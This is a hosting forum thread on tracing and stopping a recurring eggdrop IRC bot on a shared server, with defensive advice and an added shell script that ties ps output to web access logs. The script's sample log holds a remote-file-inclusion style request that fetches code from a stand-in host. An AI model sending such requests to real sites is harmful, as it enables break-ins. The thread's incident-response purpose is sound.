I've seen eggdrop (counterstrike) pop up on my server every now and again. What pisses me off is that I can't trace it. I know it's not the user himself installing it; I've modified his password and even his username but can't see how it keeps coming back in his user space.
Right now every time I see it pop up I do a kill -9 <process id> and then rm the eggdrop folder.
However, this is annoying.
Can you guys suggest anything to get rid of eggdrop, or prevent it from running in the first place?
Eggdrop is an IRC (Internet Relay Chat) bot. I'm mentioning this since you wrote counterstrike in parentheses next to it, but eggdrop has nothing to do with gameservers.
You should generally prevent or restrict users from running processes (any of them, not just eggdrop) as that can get you in a lot of trouble (i.e. using your server for DDoS attacks). The most common way someone was able to run a process (i.e. an eggdrop) without your knowledge and without having SSH/TELNET access is possibly through your web server. I'd recommend you run 'ps auxww | grep eggdrop' next time you notice the bot running. If the account is nobody, apache, www, or any other account your web server (or some other server daemon) runs as, then you almost know how they got it loaded.
Furthermore, there are several methods for preventing this, like restricting execute permission on some partitions like /tmp and using some third party software (i.e. mod_security), while keeping all your web software updated to decrease vulnerabilities would also be wise.
Feel free to provide more information (like what 'ps auxww | grep eggdrop' shows) in order for people to be able to help you more, and good luck.
You could use mod_security to block off any URL with eggdrop in it, or the URL that is being used to get in.
When the eggdrop is running, use "ps auxw | grep eggdrop" to see what time it started. Then go look at the http logs (/etc/https/domlogs/thedomain.com on cpanel) and find out what URL was being used to break in. Block that with mod_security, delete it, upgrade the package, or otherwise fix the vulnerable code.
You could block off the IRC port, which would be a nice permanent solution. If you do an "lsof" or "netstat -p" when the eggdrop is running, you'll see what ports it has open.
As a temporary fix, you could create a directory called 'eggdrop' in the user account, owned by root mode 0 (only a bandaid but if it's script kiddies or automated may be enough).
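The triage the two posts above describe (find the bot with ps, check which account owns it, then pull the access-log lines from the minute it started) as an added shell example; this is not code from the thread or from the eggdrop project. The ps output and the combined-format access log below are constructed samples, and the hostile-looking URL in them is illustrative, not a real vulnerability.

```sh
#!/bin/sh
# Constructed sample of 'ps auxww' output (not taken from a real system).
PS_SAMPLE='USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1   2036   688 ?        Ss   Jan01   0:05 init
nobody    4711  0.3  1.2  12340  6120 ?        S    14:32   0:01 ./eggdrop -m eggdrop.conf
bob       4802  0.0  0.2   3400  1200 pts/0    S+   14:40   0:00 grep eggdrop'

# Constructed sample of a combined-format HTTP access log (addresses from
# documentation ranges; the request URLs are made up for illustration).
LOG_SAMPLE='198.51.100.7 - - [05/Mar/2004:14:31:58 +0000] "GET /gallery/view.php?page=http://203.0.113.9/x.txt HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.0.2.10 - - [05/Mar/2004:14:32:03 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Mar/2004:14:32:07 +0000] "GET /gallery/view.php?page=http://203.0.113.9/x.txt HTTP/1.1" 200 64 "-" "Mozilla/4.0"'

# Print "user pid start" for every eggdrop process in ps output read from
# stdin, skipping the "grep eggdrop" line that matches itself.
eggdrop_procs() {
    awk '$11 !~ /grep/ && $0 ~ /eggdrop/ { print $1, $2, $9 }'
}

# Succeed (exit 0) when the owner is an account a daemon typically runs as;
# a bot under such an account points at the web server as the way in.
is_daemon_account() {
    case "$1" in
        nobody|apache|www|www-data|httpd) return 0 ;;
        *) return 1 ;;
    esac
}

# Print access-log lines from stdin whose timestamp is in the minute HH:MM
# given as $1 (the START column of ps for processes started today).
log_hits_at() {
    awk -v hm="$1" '{ split($4, t, ":"); if ((t[2] ":" t[3]) == hm) print }'
}

# Tie it together: for each bot process, report owner, account class and
# the requests logged in the minute it appeared.
report() {
    printf '%s\n' "$PS_SAMPLE" | eggdrop_procs | while read -r user pid start; do
        if is_daemon_account "$user"; then kind=daemon-account; else kind=user-account; fi
        echo "pid=$pid user=$user ($kind) started=$start"
        printf '%s\n' "$LOG_SAMPLE" | log_hits_at "$start"
    done
}

report
```

On a live box replace the two samples with `ps auxww` and the real domlog; a bot owned by the web server's account plus a request to one script in the same minute is the lead to chase.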
I would enable a firewall on the server and block off the IRC ports 6660-6669 and 7000. It'll at least stop the bots from connecting to IRC so whoever is causing the trouble might go away. You'll also want to enable safe mode in PHP along with open_basedir protection.
I personally do not recommend having a firewall blocking intruder(s)' outgoing connections (like Lomag & PhilG advised). Indeed that might stop them from running an eggdrop to a normal IRC server that listens on 6667/TCP, but it won't stop them from running an eggdrop (even using your server as a botnet drone) into a more private IRCd that may be listening on any port, i.e. at 80/TCP (HTTP).
Additionally, if the intruder(s) realize that you're filtering their traffic, they might take it against you, either running some malicious processes (trying to gain root access or cause other trouble) or defacing your websites, because if they're doing it through your web server's account, then most possibly they'll be able to have write permissions to some of your web files.
So the best solution for me is to prevent them at the earliest stage, from getting into the server (by filtering PHP functions or even better using mod_security), rather than filtering their outgoing traffic after they're actually already in the server.
Another good tip is disabling your compilers shown in the code above. Also when you find an eggdrop running don't kill it straight away; look in the /proc/<pid>/ folder as it sometimes has good info.
By the way, saying "I tried the firewall stuff, it gets too complicated. there has to be an easier solution..." is simply appalling from any admin! A firewall is a must. Being a web host or hosting web sites is a very important job. Security should be top notch!
God, if only everyone actually patched their servers there would be SOOO much less crap on the net!